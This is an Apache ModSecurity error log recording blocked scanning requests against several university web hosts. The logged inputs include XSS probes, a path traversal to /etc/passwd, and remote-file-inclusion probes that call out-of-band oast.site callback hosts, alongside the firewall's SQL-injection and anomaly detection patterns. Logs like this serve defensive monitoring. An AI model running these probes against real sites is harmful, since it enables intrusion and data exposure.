[Tue Aug 29 11:55:52.159095 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqY6LgAAAAr"]
[Tue Aug 29 11:55:52.216881 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0zgije1b3fi9yb.oast.site found within TX:1: cjmnijtjmimvgniikdb0zgije1b3fi9yb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6LsAAAAr"]
[Tue Aug 29 11:55:52.225023 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rprch7rxn4h4f.oast.site found within TX:1: cjmnijtjmimvgniikdb0rprch7rxn4h4f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqeFdsAAAAx"]
[Tue Aug 29 11:55:52.225073 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06wfej7khcijkd.oast.site found within TX:1: cjmnijtjmimvgniikdb06wfej7khcijkd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUqIAAAAh"]
[Tue Aug 29 11:55:52.244408 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqeFdwAAAAx"]
[Tue Aug 29 11:55:52.299160 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0mx13jqzs9j1ts.oast.site found within TX:1: cjmnijtjmimvgniikdb0mx13jqzs9j1ts.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAArB1rYAAAAV"]
[Tue Aug 29 11:55:52.530487 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0h3rnntbbo3ni6.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0h3rnntbbo3ni6.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArD6a8AAAAX"]
[Tue Aug 29 11:55:52.537344 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rkexit1nmqn4h.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0rkexit1nmqn4h.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAqeFeAAAAAx"]
[Tue Aug 29 11:55:52.551268 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb016cqno5sposrx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb016cqno5sposrx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArD6bAAAAAX"]
[Tue Aug 29 11:55:52.557279 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0u9tbzxe561c3e.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0u9tbzxe561c3e.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAq4fYUAAAAJ"]
[Tue Aug 29 11:55:52.558232 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAApbUqgAAAAh"]
[Tue Aug 29 11:55:52.667418 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb05ubhcxidbcwdy.oast.site/ found within TX:1: cjmnijtjmimvgniikdb05ubhcxidbcwdy.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArC7Z8AAAAW"]
[Tue Aug 29 11:55:52.669373 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAq4fYoAAAAJ"]
[Tue Aug 29 11:55:52.687559 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAArC7aAAAAAW"]
[Tue Aug 29 11:55:52.688058 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAApbUq4AAAAh"]
[Tue Aug 29 11:55:52.726902 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAArC7aIAAAAW"]
[Tue Aug 29 11:55:53.576069 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAApbUrEAAAAh"]
[Tue Aug 29 11:55:53.579305 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0neqqzo7nezd3k.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0neqqzo7nezd3k.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArB1r8AAAAV"]
[Tue Aug 29 11:55:53.605468 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAArC7aQAAAAW"]
[Tue Aug 29 11:55:53.675078 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09oin889ctpmed.oast.site/ found within TX:1: cjmnijtjmimvgniikdb09oin889ctpmed.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAolKyoAAAAe"]
[Tue Aug 29 11:55:53.684093 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb065t4tejzbs3bz.oast.site/ found within TX:1: cjmnijtjmimvgniikdb065t4tejzbs3bz.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bQAAAAX"]
[Tue Aug 29 11:55:53.735916 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAAqTvzMAAAAa"]
[Tue Aug 29 11:55:53.739095 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0p6xyf3rt7x3su.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0p6xyf3rt7x3su.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bUAAAAX"]
[Tue Aug 29 11:55:53.807650 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArD6bYAAAAX"]
[Tue Aug 29 11:55:53.816233 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqTvzQAAAAa"]
[Tue Aug 29 11:55:53.855417 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqeFeUAAAAx"]
[Tue Aug 29 11:55:53.869117 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0n633ctxeys8wm.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0n633ctxeys8wm.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqY6MQAAAAr"]
[Tue Aug 29 11:55:53.895502 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq4fZIAAAAJ"]
[Tue Aug 29 11:55:53.900676 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqeFecAAAAx"]
[Tue Aug 29 11:55:53.902464 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqTvzcAAAAa"]
[Tue Aug 29 11:55:53.926606 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq5@GsAAAAK"]
[Tue Aug 29 11:55:53.947562 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqY6McAAAAr"]
[Tue Aug 29 11:55:53.949299 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArC7asAAAAW"]
